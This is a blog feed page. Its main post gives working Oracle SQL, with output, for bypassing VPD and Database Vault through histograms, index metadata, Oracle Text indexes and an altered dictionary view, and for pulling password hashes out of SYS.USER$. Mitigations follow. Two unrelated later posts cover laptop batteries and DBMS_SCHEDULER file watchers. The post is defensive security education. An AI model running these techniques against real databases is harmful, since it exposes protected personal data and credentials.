The Anti-Kyte

Subscribe to The Anti-Kyte feed The Anti-Kyte
Oracle - for when it was like that when you got there
Updated: 3 hours 11 min ago

Horrible Histograms and Invidious Indexes – Exploits to by-pass Oracle Database Security – including VPD and Database Vault

Fri, 2020-11-20 10:55

This article is about how Indexes and Histograms may be used to view data to which a user does not ordinarily have access. It includes details of how these objects can be used to circumvent both Virtual Private Database and Database Vault restrictions.
If you want a serious and thorough exploration of these issues then I’d suggest you take a look at Alexander Kornbrust’s recent DOAG Presentation.

However, if you like your infosec to come with cute puppy pics, read on…

Meet Alexander Kornbrust. He’s an Information Security specialist with a particular focus on Oracle.

Having known Alex for many years, there are a couple of things about him that I find striking. Firstly, every time we have a conversation about the Oracle RDBMS, I learn something new. Secondly, in all these years, he hasn’t aged a day :

Alex has found some “interesting” behaviours inherent in Relational Databases in general and Oracle is no exception in this respect.

Before we get into that though, we need to meet the story’s main protagonist.

His name is Teddy. He’s done a bit of background research for the role and he thinks that remaining incognito would be a good starting point :

Have you got a false nose to go with these glasses ?

Truth be told, persuading him to do this ( in fact to do anything he’s supposed to) took some doing. In the end however, we overcame the human/canine communication barrier by employing the Esperanto of bribery. As a result, Teddy now has a large stockpile of dog biscuits. The relevance of this will become apparent shortly…

NOTE – I was able to run all of the code in this article on Oracle 18cXE running on CentOS 7.

Teddy just got a job at Lead the Way – a pet equipment company. He’s just been added to the Company’s HR system, which may well look rather familiar…

insert into employees( 
    employee_id, first_name, last_name, email, phone_number,
    hire_date, job_id, salary, manager_id, department_id)
values(
    employees_seq.nextval, 'Teddy', 'Dog', 'TDOG', '590.423.4570',
    to_date('20190226', 'YYYYMMDD'), 'IT_PROG', 2000, 103, 60)
/

Whilst he is only a lowly paid member of the IT Department, he does have some relatively powerful privileges in order to look after the system :

grant create session, select_catalog_role to tdog identified by password_buried_in_the_garden;

Teddy’s privileges will change as we go through this post. For now though, they are as follows :

select privilege, 'System Privilege' as PRIVILEGE_TYPE from session_privs union
select role, 'Granted Role' from session_roles;

PRIVILEGE                      PRIVILEGE_TYPE  
------------------------------ ----------------
CREATE SESSION                 System Privilege
HS_ADMIN_SELECT_ROLE           Granted Role    
SELECT_CATALOG_ROLE            Granted Role    

This means that Teddy has no access to data in the application tables :

select *
from hr.locations;

ERROR at line 2:
ORA-01031: insufficient privileges

Actually, that’s not entirely true…

Accessing High/Low values via an index

As Teddy has SELECT_CATALOG_ROLE, he can confirm that there is actually a LOCATIONS table in the HR schema…

select object_type
from dba_objects
where owner = 'HR'
and object_name = 'LOCATIONS';

OBJECT_TYPE            
-----------------------
TABLE                  

…confirm which columns are in the locations table…

select column_name, data_type
from dba_tab_columns
where owner = 'HR'
and table_name = 'LOCATIONS';

COLUMN_NAME                    DATA_TYPE           
------------------------------ --------------------
LOCATION_ID                    NUMBER              
STREET_ADDRESS                 VARCHAR2            
POSTAL_CODE                    VARCHAR2            
CITY                           VARCHAR2            
STATE_PROVINCE                 VARCHAR2            
COUNTRY_ID                     CHAR     

…and which of those columns are indexed…

select index_name, column_name
from dba_ind_columns
where table_owner = 'HR'
and table_name = 'LOCATIONS';

INDEX_NAME                     COLUMN_NAME                   
------------------------------ ------------------------------
LOC_CITY_IX                    CITY                          
LOC_STATE_PROVINCE_IX          STATE_PROVINCE                
LOC_COUNTRY_IX                 COUNTRY_ID                    
LOC_ID_PK                      LOCATION_ID     

Which means we can find at least two values for character columns by querying the index meta-data…

with
    function raw_to_date(i_var in raw) return date as
        o_var date; 
    begin 
        dbms_stats.convert_raw_value(i_var,o_var); 
        return o_var; 
    end;
    function raw_to_number(i_var in raw) return number as
        o_var number; 
    begin 
        dbms_stats.convert_raw_value(i_var,o_var); 
        return o_var; 
    end;
    function raw_to_varchar2(i_var in raw) return varchar2 as
        o_var varchar2(32767); 
    begin 
        dbms_stats.convert_raw_value(i_var,o_var); 
        return o_var; 
    end;
select  
    case(substr(data_type,1,9))
        when 'VARCHAR2' then  to_char(raw_to_varchar2(high_value)) 
            end as plain_text_lo_val,
    case(substr(data_type,1,9))
        when 'VARCHAR2' then to_char(raw_to_varchar2(low_value))
    end as plain_text_hi_val
from dba_tab_columns
where table_name = 'LOCATIONS'
and column_name = 'CITY'
/

PLAIN_TEXT_LO_VAL    PLAIN_TEXT_HI_VAL   
-------------------- --------------------
Whitehorse           Beijing             

There’s a lot more data skulking around in other corners of the data dictionary…

Horrible histograms

Looking at the histograms generated by stats gathering jobs, we can find even more LOCATIONS data :

select column_name
from dba_histograms
where owner = 'HR'
and table_name = 'LOCATIONS'
having count(*) > 2
group by column_name;

COLUMN_NAME                   
------------------------------
COUNTRY_ID                    

As there are more than two rows for the LOCATIONS.COUNTRY_ID column in DBA_HISTOGRAMS Teddy knows that HISTOGRAM stats have been gathered.

As this column is actually a VARCHAR2, he can see the unencrypted COUNTRY_ID values simply by running :

select endpoint_actual_value
from dba_histograms
where owner = 'HR'
and table_name = 'LOCATIONS'
and column_name = 'COUNTRY_ID'
/

ENDPOINT_ACTUAL_VALUE                                                                                                             
----------------------
AU                                                                                                                                
BR                                                                                                                                
CA                                                                                                                                
CH                                                                                                                                
CN                                                                                                                                
DE                                                                                                                                
IN                                                                                                                                
IT                                                                                                                                
JP                                                                                                                                
MX                                                                                                                                
NL                                                                                                                                
SG                                                                                                                                
UK                                                                                                                                
US                                                                                                                                

14 rows selected. 

Remember, all Teddy has done to access this information is to run a few queries against the data dictionary.

In fact, the statement that created the histogram we’ve just looked at is contained in one of the HR schema creation scripts – $ORACLE_HOME/demo/schema/human_resources/hr_analz.sql :

EXECUTE dbms_stats.gather_schema_stats( 
        'HR'                            ,       
        granularity => 'ALL'            ,       
        cascade => TRUE                 ,       
        block_sample => TRUE            );

Even if selects on the table are being audited, these queries on the data dictionary will not be picked up.

While this is all very interesting, Teddy has other plans. After all, he wants to start monetizing his biscuit mountain and thinks that a mailing campaign would be just the job to generate sales. After all, it’s a Pet equipment company so some of his colleagues must be dog people. What he wants to do, therefore, is to obtain a list of email addresses…

Creating a histogram to bypass SELECT auditing

Teddy has passed his probation and now has an additional privilege :

grant analyze any to tdog;

Once he’s found the column that holds the data he’s interested in…

select column_name
from dba_tab_columns
where owner = 'HR'
and table_name = 'EMPLOYEES';

COLUMN_NAME         
--------------------
EMPLOYEE_ID
FIRST_NAME
LAST_NAME
EMAIL
PHONE_NUMBER
HIRE_DATE
JOB_ID
SALARY
COMMISSION_PCT
MANAGER_ID
DEPARTMENT_ID

11 rows selected. 

…he can check to see if a histogram already exists :

select endpoint_actual_value
from dba_histograms
where owner = 'HR'
and table_name = 'EMPLOYEES'
and column_name = 'EMAIL';

ENDPOINT_ACTUAL_VALUE                   
----------------------------------------



2 rows selected. 

As there are only two rows, each with a null ENDPOINT_ACTUAL_VALUE, Teddy can infer that no histogram exists on the table. However, this is not a major problem as he can use his new privilege to generate one :

begin
    dbms_stats.gather_table_stats(
        ownname => 'HR',
        tabname => 'EMPLOYEES',
        method_opt => 'FOR COLUMNS EMAIL size 255');
end;
/

It’s worth remembering that gathering stats on a table will not trigger auditing of SELECT statements on the table.

Now, he can access all of the EMPLOYEES.EMAIL values :

select endpoint_actual_value
from dba_histograms
where owner = 'HR'
and table_name = 'EMPLOYEES'
and column_name = 'EMAIL';



ENDPOINT_ACTUAL_VALUE                   
----------------------------------------
ABANDA
ABULL
ACABRIO
AERRAZUR
AFRIPP
AHUNOLD
AHUTTON
AKHOO
AMCEWEN
AWALSH
BERNST
BEVERETT
CDAVIES
CJOHNSON
COLSEN
CVISHNEY

****SNIP****

SVOLLMAN
TFOX
TGATES
TJOLSON
TRAJS
VJONES
VPATABAL
WGIETZ
WSMITH
WTAYLOR

107 rows selected.
Indexes and Histograms vs Virtual Private Database

The concept of Virtual Private Databases (VPD) has been around for many years in Oracle. Essentially, VPDs restrict data access by adding a predicate to DML statements against specific tables.

There’s a brief explanation of how it all works here.

Before we go any further, let’s remove the histogram Teddy created on EMPLOYEES.EMAIL :

exec dbms_stats.gather_table_stats( ownname => 'HR', tabname => 'EMPLOYEES', method_opt => 'FOR COLUMNS EMAIL size 1');

select endpoint_actual_value
from dba_histograms
where owner = 'HR'
and table_name = 'EMPLOYEES'
and column_name = 'EMAIL';

ENDPOINT_ACTUAL_VALUE                                                           
--------------------------------------------------------------------------------
                                                                                
                                                                                

2 rows selected. 

For the purposes of our story, we’ve taken a brutal yet effective approach to VPD implementation for the EMPLOYEES table.

Having adjusted HR’s privileges :

grant execute on dbms_rls to hr

…we’ve created this function in the HR schema :

create or replace function dept_id_fn( i_schema user_users.username%type, i_table user_objects.object_name%type)
    return varchar2 is
begin
    return 'department_id = 60';
end dept_id_fn;
/

…and (as HR), created a policy for all SELECT statements on the table :

begin
    dbms_rls.add_policy(
        object_schema => 'HR', 
        object_name => 'EMPLOYEES', 
        policy_name => 'OWN_DEPT', 
        function_schema => 'HR', 
        policy_function => 'dept_id_fn', 
        statement_types => 'SELECT');
end;
/

The upshot of this is that even HR can now only select rows from the EMPLOYEES table that have a DEPARTMENT_ID of 60 :

select department_id, email
from employees;

DEPARTMENT_ID EMAIL                    
------------- -------------------------
           60 AHUNOLD                  
           60 BERNST                   
           60 DAUSTIN                  
           60 VPATABAL                 
           60 DLORENTZ                 
           60 TDOG                     

6 rows selected. 

Meanwhile, Teddy has now been granted access to the table :

grant select on hr.employees to tdog;
Bypassing VPD with a Histogram

Like HR, Teddy can only see the six Department 60 records in EMPLOYEES :

select department_id, count(*)
from hr.employees
group by department_id;

DEPARTMENT_ID   COUNT(*)
------------- ----------
           60          6

However, he can still use the histogram trick to view all of the email addresses :

exec dbms_stats.gather_table_stats( 
    ownname => 'HR', 
    tabname => 'EMPLOYEES', 
    method_opt => 'FOR COLUMNS EMAIL size 255');

select endpoint_actual_value
from dba_histograms
where owner = 'HR'
and table_name = 'EMPLOYEES'
and column_name = 'EMAIL'
/

ENDPOINT_ACTUAL_VALUE                                                           
--------------------------------------------------------------------------------
***snip***

TFOX                                                                            
TGATES                                                                          
TJOLSON                                                                         
TRAJS                                                                           
VJONES                                                                          
VPATABAL                                                                        
WGIETZ                                                                          
WSMITH                                                                          
WTAYLOR                                                                         

108 rows selected. 

Bypassing VPD with a fulltext index

Histograms are not the only dictionary object that can be used to circumvent VPD policies.

Let’s say that Teddy ( TDOG as he now inisits on being called) has the following additional privileges :

grant create table, create any index to tdog;
alter user tdog quota unlimited on users;

He could do the following…

create index tdog.email_idx on hr.employees(email) 
    indextype is ctxsys.context;

This statement uses Oracle Text to create an index on HR.EMPLOYEES.EMAIL.

The index itself is owned by TDOG. Teddy can then query the index, the creation of which has by-passed the VPD policy on the table :

select token_text
from dr$email_idx$i
/

TOKEN_TEXT                                                                      
***snip***
TFOX                                                                            
TGATES                                                                          
TJOLSON                                                                         
TRAJS                                                                           
VJONES                                                                          
VPATABAL                                                                        
WGIETZ                                                                          
WSMITH                                                                          
WTAYLOR                                                                         

108 rows selected.

So, we can conclude that data is visible via histograms and indexes, even when it is otherwise protected by a VPD policy.

Incidentally, it’s worth noting that this applies even if the index or histogram in question was created prior to the implementation of the VPD policy.

For example…

Bypassing VPD to access high and low values in a pre-existing index

Teddy can see values outside those defined by the VPD simply by looking at columns with pre-existing indexes. For example, the EMPLOYEE.EMAIL column already has an index :

select index_name
from dba_ind_columns
where table_owner = 'HR'
and table_name = 'EMPLOYEES'
and column_name = 'EMAIL';

INDEX_NAME                    
------------------------------
EMP_EMAIL_UK


…which Teddy can now take advantage of as we’ve seen previously :

with
    function raw_to_varchar2(i_var in raw) return varchar2 as
        o_var varchar2(32767); 
    begin 
        dbms_stats.convert_raw_value(i_var,o_var); 
        return o_var; 
    end;
select  
    case(substr(data_type,1,9))
        when 'VARCHAR2' then  to_char(raw_to_varchar2(high_value)) 
            end as plain_text_lo_val,
    case(substr(data_type,1,9))
        when 'VARCHAR2' then to_char(raw_to_varchar2(low_value))
    end as plain_text_hi_val
from dba_tab_columns
where table_name = 'EMPLOYEES'
and column_name = 'EMAIL'
/


PLAIN_TEXT_LO_VAL                   PLAIN_TEXT_HI_VAL                  
----------------------------------- -----------------------------------
WTAYLOR                             ABANDA                             

Breaking into the Oracle Database Vault

The DBA at Lead the Way is fed up with all the spam she’s been getting about cheap dog biscuits. Apart from anything else, she’s a cat person.

Therefore, she’s decided to step up the data security by replacing the Virtual Private Database with an Oracle Database Vault Realm for the HR schema :

conn c##dbv_owner@xepdb1


begin
    DBMS_MACADM.CREATE_REALM (
    realm_name => 'HR Realm',
    description => 'Human Resources - Right-sizing your future',
    enabled => DBMS_MACUTL.G_YES,
    audit_options => DBMS_MACUTL.G_REALM_AUDIT_FAIL,
    realm_type => 1); 
end; 
/

begin
    DBMS_MACADM.ADD_OBJECT_TO_REALM(
    realm_name => 'HR Realm',
    object_owner => 'HR',
    object_name => '%',
    object_type => 'TABLE'); 
end; 
/

begin
    DBMS_MACADM.ADD_AUTH_TO_REALM(
        realm_name => 'HR Realm',
        grantee => 'HR',
        auth_options => DBMS_MACUTL.G_REALM_AUTH_OWNER); 
end;
/

As a result of this, HR can still see it’s own tables, but no-one else can.

Even connecting as SYSDBA doesn’t help :

conn sys@xepdb1 as sysdba
Password? (**************?) ************
Connected.
SQL> select count(*) from hr.employees;

select count(*) from hr.employees
                        *
ERROR at line 1:
ORA-01031: insufficient privileges

Furthermore, a histogram won’t help in this instance, as all of the values show up in DBA_HISTOGRAMS as null :

begin
    dbms_stats.gather_table_stats(
        ownname => 'HR',
        tabname => 'EMPLOYEES',
        method_opt => 'FOR COLUMNS EMAIL size 255');
end;
/


PL/SQL procedure successfully completed.

select endpoint_actual_value
from dba_histograms
where owner = 'HR'
and table_name = 'EMPLOYEES'
and column_name = 'EMAIL'

ENDPOINT_ACTUAL_VALUE                                                           
--------------------------------------------------------------------------------
                                                                                
                                                                                
***snip***                                                                                
                                                                                
                                                                                
108 rows selected. 

According to popular culture at the moment, if you’re going to crack a vault, you will need Ray Winston and some mates armed with bus passes and an industrial drill ( other ageing cockney geezers are available).

Fortunately for us, the same can be achieved by a cheeky chappie with a database account.

Taking a closer look at the source code for DBA_TAB_HISTOGRAMS – the data dictionary view pointed to by the DBA_HISTOGRAMS public synonym – we can see that it uses the following line to enforce the Data Vault restrictions :

sys_op_dv_check(o.name,o.owner#)= 1

Let’s get the view query and change all occurences of this line to :

sys_op_dv_check(o.name,o.owner#)!= 1

The resulting query looks like this :

with cheeky_chappie_histos as
(
    select /*+ ordered */ u.name as owner,
           o.name as table_name,
           decode(bitand(c.property,1),1,a.name,c.name) as column_name,
           h.bucket as endpoint_number,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   h.endpoint
               else
                   null
           end as endpoint_value,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   case
                       when h.epvalue is not null then
                           epvalue
                       else
                           dbms_stats.conv_raw(h.epvalue_raw,c.type#)
                   end
               else
                   null
           end as endpoint_actual_value,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   h.epvalue_raw
               else
                   null
           end as endpoint_actual_value_raw,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   h.ep_repeat_count
               else
                   null
           end as endpoint_repeat_count,
           'SHARED' as scope
    from sys.user$            u,
         sys.obj$             o,
         sys.col$             c,
         sys."_HISTGRM_DEC"   h,
         sys.attrcol$         a
    where o.obj# = c.obj# and o.owner# = u.user# and c.obj# = h.obj# and c.intcol# = h.intcol# and(o.type# in(
        3,
        4
    )                                     /* cluster, view */or(o.type# = 2     /* tables, excluding iot - overflow and nested tables */ and not exists(
        select null
        from sys.tab$ t
        where t.obj# = o.obj# and(bitand(t.property,512)= 512 or bitand(t.property,8192)= 8192)
    )))and c.obj# = a.obj#(+)and c.intcol# = a.intcol#(+)
    union all
    select /*+ ordered */ u.name,
           o.name,
           decode(bitand(c.property,1),1,a.name,c.name),
           0,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   h.minimum
               else
                   null
           end,
           null,
           null,
           0,
           'SHARED'
    from sys.user$              u,
         sys.obj$               o,
         sys.col$               c,
         sys."_HIST_HEAD_DEC"   h,
         sys.attrcol$           a
    where o.obj# = c.obj# and o.owner# = u.user# and c.obj# = h.obj# and c.intcol# = h.intcol# and(o.type# in(
        3,
        4
    )                                     /* cluster, view */or(o.type# = 2     /* tables, excluding iot - overflow and nested tables */ and not exists(
        select null
        from sys.tab$ t
        where t.obj# = o.obj# and(bitand(t.property,512)= 512 or bitand(t.property,8192)= 8192)
    )))and h.row_cnt = 0 and h.distcnt > 0 and c.obj# = a.obj#(+)and c.intcol# = a.intcol#(+)
    union all
    select /*+ ordered */ u.name,
           o.name,
           decode(bitand(c.property,1),1,a.name,c.name),
           1,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   h.maximum
               else
                   null
           end,
           null,
           null,
           0,
           'SHARED'
    from sys.user$              u,
         sys.obj$               o,
         sys.col$               c,
         sys."_HIST_HEAD_DEC"   h,
         sys.attrcol$           a
    where o.obj# = c.obj# and o.owner# = u.user# and c.obj# = h.obj# and c.intcol# = h.intcol# and(o.type# in(
        3,
        4
    )                                     /* cluster, view */or(o.type# = 2     /* tables, excluding iot - overflow and nested tables */ and not exists(
        select null
        from sys.tab$ t
        where t.obj# = o.obj# and(bitand(t.property,512)= 512 or bitand(t.property,8192)= 8192)
    )))and h.row_cnt = 0 and h.distcnt > 0 and c.obj# = a.obj#(+)and c.intcol# = a.intcol#(+)
    union all
    select /*+ ordered */ 'SYS',
           ft.kqftanam,
           c.kqfconam,
           h.bucket,
           h.endpoint,
           case
               when h.epvalue is not null then
                   epvalue
               else
                   dbms_stats.conv_raw(h.epvalue_raw,c.kqfcodty)
           end,
           h.epvalue_raw,
           h.ep_repeat_count,
           'SHARED'
    from sys.x$kqfta          ft,
         sys.fixed_obj$       fobj,
         sys.x$kqfco          c,
         sys."_HISTGRM_DEC"   h
    where ft.kqftaobj = fobj.obj# and c.kqfcotob = ft.kqftaobj and h.obj# = ft.kqftaobj and h.intcol# = c.kqfcocno
  /*
   * if fobj and st are not in sync (happens when db open read only
   * after upgrade), do not display stats.
   */ and ft.kqftaver = fobj.timestamp - to_date('01-01-1991','DD-MM-YYYY')
    union all
    select /*+ ordered */ u.name,
           o.name,
           decode(bitand(c.property,1),1,a.name,c.name),
           h.bucket_kxttst_hs,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   h.endpoint_kxttst_hs
               else
                   null
           end,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   dbms_stats.conv_raw(h.epvalue_raw_kxttst_hs,c.type#)
               else
                   null
           end,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   h.epvalue_raw_kxttst_hs
               else
                   null
           end,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   h.ep_repeat_count_kxttst_hs
               else
                   null
           end,
           'SESSION'
    from sys.user$         u,
         sys.obj$          o,
         sys.col$          c,
         sys.x$kxttstehs   h,
         sys.attrcol$      a
    where o.obj# = c.obj# and o.owner# = u.user# and c.obj# = h.obj#_kxttst_hs and c.intcol# = h.intcol#_kxttst_hs and(o.type# in
    (
        3,
        4
    )                                     /* cluster, view */or(o.type# = 2     /* tables, excluding iot - overflow and nested tables */ and not exists(
        select null
        from sys.tab$ t
        where t.obj# = o.obj# and(bitand(t.property,512)= 512 or bitand(t.property,8192)= 8192)
    )))and c.obj# = a.obj#(+)and c.intcol# = a.intcol#(+)
)
select *
from cheeky_chappie_histos 
where owner = 'HR'
and table_name = 'EMPLOYEES'
and column_name = 'EMAIL'
/

…and returns the actual values in the histogram :

ENDPOINT_ACTUAL_VALUE                                                           
--------------------------------------------------------------------------------
ABANDA                                                                          
ABULL                                                                           
ACABRIO                                                                         
AERRAZUR                                                                        
AFRIPP                                                                          
AHUNOLD                                                                         
AHUTTON                                                                         
AKHOO                                                                           
AMCEWEN                                                                         
AWALSH                                                                          
BERNST               

***SNIP***


108 rows selected. 

Reading Oracle Password Hashes from a Histogram

Before we wrap things up, there is one final exploit to examine.

Connected to the database as SYSTEM, we have no access to the SYS.USER$ table, which holds the password hashes in the SPARE4 column :

select spare4
from sys.user$
/

ERROR at line 2:
ORA-01031: insufficient privileges

However, SYSTEM has the ANALYZE ANY DICTIONARY privilege. Therefore, we can do this :

begin
    dbms_stats.gather_table_stats(
        ownname => 'SYS',
        tabname => 'USER$',
        method_opt => 'FOR COLUMNS SPARE4 size 255');
end;
/

…which now makes the password hashes available via the histogram :

select endpoint_actual_value
from dba_histograms
where owner = 'SYS'
and table_name = 'USER$'
and column_name = 'SPARE4'
/

ENDPOINT_ACTUAL_VALUE                   
----------------------------------------

****Loads of password hashes****

Mitigations

So, what can our erstwhile DBA do to avoid becoming knee deep in unwanted doggy treats ?

First of all, she needs to consider that, whilst the above examples have been generated on 18c, other releases may also be affected. She would need to verify this on whatever version and edition she is currently running.

Oracle are constantly working to provide fixes for vulnerabilities so timely application of Oracle Critical Patch Updates should remain a priority.

It should be noted that CPUs are not provided for Express Edition databases. Therefore, consideration should be given to what audience is appropriate for an application running on this database edition.

Every table for which auditing is enabled for select statements should have CREATE INDEX statements audited as well. Under normal circumstances, this activity should be rare and is therefore unlikely to flood the audit trail with a large number of additional entries.

Keeping track of which schemas have the privileges mentioned here would be useful. Equally useful would be to keep track of who can connect to the database using those schemas.

To recap, the main privileges (and role) in question are :

  • ANALYZE ANY
  • ANALYZE ANY DICTIONARY
  • CREATE ANY INDEX
  • SELECT CATALOG ROLE

Some data warehouse environments have bind variable peeking disabled. This being the case, histograms are not used by the optimizer. You can check to see if this is the case by seeing whether the _optim_peek_user_binds parameter is set :

select value
from v$parameter
where name = '_optim_peek_user_binds'
/

If the value is set to ‘TRUE’ then bind variable peeking is disabled and you can consider clearing down any histograms on application tables.

NOTE – as this is an underscore parameter and thus undocumented, you should check to make sure the above still applies to the Oracle version that you are currently running.

Acknowledgements

The brains behind this particular post belong to the afore mentioned Alexander Kornbrust. I continue to be awed by his wonderfully devious mind when it comes to all things Oracle. Teddy doesn’t agree, but he’s just sulking because Alex wouldn’t buy any dog biscuits.

This Oracle Base article on Virtual Private Databases by Tim Hall was helpful, as was this article on the same subject by Saurabh Gupta.

Of course, sometimes you just need to read the manual and my thanks goes again to the nameless Oracle Document Elves who produced the Getting Started with Database Vault Guide.

Teddy hopes that all of this has at least given you paws for thought. Oh, and would you like to buy some biscuits ?

Assaulting my Battery – Myths and Legends about looking after a laptop battery.

Mon, 2020-10-26 16:26

I’m not a hardware specialist, but I’m not averse to prizing open a laptop case occasionally when the need arises. Most of the time.
This, however was an exception. This is one view of my XPS13 that I never wanted to see :

What brought me to this point was the untimely demise of the battery.
What follows is not a blow-by-blow account of how I changed the battery, with all of the attendant nervousness that practically everything I was looking at was rather expensive and no doubt quite important.
Incidentally, if you are looking for that sort of thing then there are several helpful videos available, like this one, for example.
Rather it is an exploration of some of the advice around about ensuring your battery has a long and happy life. Specifically, it is an attempt to divine which advice is still relevant to the Lithium Ion (Li-Ion) Polymer batteries of the sort that power modern laptops…

Recharge Cycles

The expected life of a battery (i.e. how long before it wears out, not time between recharges) is measured in recharge cycles.
Fully charging a battery from 0% power to 100% is one cycle.
Usually, a laptop battery will be charged from a point before it’s been completely drained. This type of charge corresponds to part of a charge cycle.
For example, charging a battery from 20% to full will be considered as 0.8 of a cycle.
Looking at the spec for my machine, I can see that the battery is expected to last 300 cycles.

Battery “memory”

This phenomenon is where a battery “forgets” how much charge it can hold and needs to be reminded by being completely drained and then fully recharged.
Whilst this may have been true of some of the old nickel-metal hydride (NiMH) batteries, it is certainly not the case for the modern Li-Ion variety.

Overcharging

Once again, it may have been good practice in the past to disconnect the charger once the battery was fully charged. These days however, it does not appear to be the case.
For my particular machine, this question is directly addressed in an FAQ on Dell’s website :

“Can a Dell battery be overcharged ?
No, Dell laptops are designed to stop charging the battery when it reaches full charge. Once the battery is fully charged, the Dell laptop will continue to use power from the AC adapter.”

Monitoring Battery Health in Linux

There are battery monitors available whichever Linux desktop you happen to be using. If you prefer a command line tool then acpi should do the job.
Running this for my old, failing battery, output such as this wouldn’t be unusual :

acpi -ib
Battery 0: Discharging, 47%, 03:47:12 remaining
Battery 0: design capacity 7894 mAh, last full capacity 6327 mAh = 80%


The “last full capacity” reading here is an indicator that this battery has seen better days.

In contrast, the new battery looks rather more healthy :

acpi -bi
Battery 0: Discharging, 94%, 10:14:24 remaining
Battery 0: design capacity 7894 mAh, last full capacity 7894 mAh = 100%

So, how long should my battery last ?

As ever, it depends.
My own experience with the XPS13 was that 300 cycles lasted around 3 years.
Factors affecting the lifespan (in terms of elapsed time) would include, how often you use the laptop on battery as opposed to AC power, and how hard you make it work relative to the system resources (CPU, RAM, disk) at it’s disposal.
When all is said and done, it seems like 3 years is probably a reasonable lifespan, given how I use my machine.
I don’t think I’ll be making too many changes to the way I use my battery.

DBMS_SCHEDULER – Fiddling with File Watchers

Wed, 2020-09-30 13:56

I recently updated my blog profile picture. Let’s face it, it was about time. The old one was taken 14 years ago.
This time, I thought I’d go for a contemporary portrait, which has the added benefit of being less likely to frighten animals and small children.
Unfortunately, it is also crying out for a caption :

Just popping into the bank. Keep the engine running

One or two alternatives captions may well crop up in the following paragraphs.
Primarily though, I’ll be talking about the file watcher capabilities of DBMS_SCHEDULER.
Introduced in 11g, it enables developers to trigger actions when a file arrives without having to leave the comfort of their database.
There are a few moving parts and getting them to work together can take a bit of, well, fiddling.
Specifically, we’ll be looking at :

  • configuring the frequency at which filewatchers are run
  • creating a credential to use for file watching
  • creating a file watcher to determine when a file has arrived
  • creating a job for the file watcher to execute
  • adding a program so that we can get some information about the file
  • getting the filewatcher to wait for a large file transfer to complete

Before we get into all of that, we need to have a quick chat about environments…

Don’t try this at home

More specifically, don’t try this on Oracle 18c Express Edition.
The examples that follow have been tested on Oracle Enterprise Edition 12cR2 ( 12.2.0.1.0) running on Oracle Linux 7.3. I would normally run something like this on Oracle 18cXE. However, Express Edition is missing one of the components required for the File Watcher mechanism to work, namely the DBMS_ISCHED.FILE_WATCH_JOB procedure.

Finding and Configuring File Watcher settings

It’s probably worth taking a whistle-stop tour through the data dictionary views that provide some detail about how Oracle’s file watcher functionality hangs together.

Let’s start with the main scheduler job itself :

select program_owner, program_name, schedule_name, 
comments
from dba_scheduler_jobs
where owner = 'SYS'
and job_name = 'FILE_WATCHER'
/

PROGRAM_OWNER   PROGRAM_NAME         SCHEDULE_NAME             COMMENTS                      
--------------- -------------------- ------------------------- ------------------------------
SYS             FILE_WATCHER_PROGRAM FILE_WATCHER_SCHEDULE     File watcher job              

We can see that the job is associated with both a Program and a Schedule.

If we look at the program, we can find out more details about what Oracle runs under the covers when a file watcher is initiated :

select program_type, program_action, comments
from dba_scheduler_programs
where owner = 'SYS'
and program_name = 'FILE_WATCHER_PROGRAM'
/

PROGRAM_TYPE         PROGRAM_ACTION                 COMMENTS                      
-------------------- ------------------------------ ------------------------------
STORED_PROCEDURE     dbms_isched.file_watch_job     File Watcher program          

Of more immediate interest is the schedule, which will tell us how often a filewatcher will run :

select schedule_type, repeat_interval
from dba_scheduler_schedules
where schedule_name = 'FILE_WATCHER_SCHEDULE'
/

SCHEDULE_TYPE        REPEAT_INTERVAL               
-------------------- ------------------------------
CALENDAR             freq=minutely;interval=10      

What this means is that the filewatcher will check every 10 minutes to see if any file it’s looking for has arrived since it last checked.
Actually, what it means is that the filewatcher will check to see if a file it’s looking for exists and has a timestamp later than the last time it checked.
This distinction will become more relevant when we start testing. Speaking of which, testing will be rather less tedious if we can make the filewatcher run more regularly.

Therefore, I’m going to set it to run every minute.
To achieve this, I need to connect as SYSDBA and run…

alter session set container = pdb1;

begin
    dbms_scheduler.set_attribute(  
        name => 'file_watcher_schedule',
        attribute => 'repeat_interval',
        value => 'freq=minutely;interval=1');
end;
/

…where pdb1 is the name of your container database.

If we check again we should see that the FILE_WATCHER_SCHEDULE now reflects the new repeat_interval :

select repeat_interval
from dba_scheduler_schedules
where schedule_name = 'FILE_WATCHER_SCHEDULE'
/

REPEAT_INTERVAL               
------------------------------
freq=minutely;interval=1     

Cautious Credential Creation

We’re going to need access to an OS account that can read the files as they come in.
If we’re going to do anything with the files (e.g. load data) then the OS user that started Oracle (usually oralce) will also need to read these files.

The easiest way to achieve this is simply to create a credential for the oracle OS user.
There was an exploit back in 11gR2, which meant that it was possible to discover the password of the OS user used in a credential.
This particular vulnerability seems to have been fixed in later versions. It doesn’t work on the 12c R2 database I’m using here for example.
Whilst I’m not aware of any such vulnerabilities extant for more recent versions, it would seem prudent to use a somewhat less privileged OS user for our credential…

Sorry about the bag, didn’t have time to shave!

You’re not obliged to laugh at that rather oblique Blackadder reference in this heading, which I thought might be suitable as a caption for that photo. Anyhow, it does explain the name of the OS user I’ve created to use for our credential…

sudo useradd -m ponsonby
sudo passwd ponsonby

…creating a password for ponsonby when prompted.

Whilst I’m here, I may as well create the directory to hold the files under ponsonby’s home directory, which will ensure the user has access to these files.
To allow oracle to also see the files, I’ll set the directory group to be oinstall, the oracle user’s primary group.
Note that I don’t need to make ponsonby a member of this group.
Finally, I need to set the others executable bit on ponsonby’s home directory so that oracle can access the in_files sub-directory :

sudo mkdir /home/ponsonby/in_files
sudo chown ponsonby /home/ponsonby/in_files 
chgrp oinstall /home/ponsonby/in_files
sudo chmod a+x /home/ponsonby

Now we have a landing directory for our files, we can create a directory object for it in the database. Whilst this is not required for the filewatcher itself, I’m going to want to read the contents of the file from within the database at some point so…

create directory in_files as '/home/ponsonby/in_files'
/

Finally, we can create our credential…

begin
    dbms_credential.create_credential(
        credential_name => 'caption_cred',
        username => 'ponsonby',
        password => 'a-fiendishly-difficult-to-guess-password',
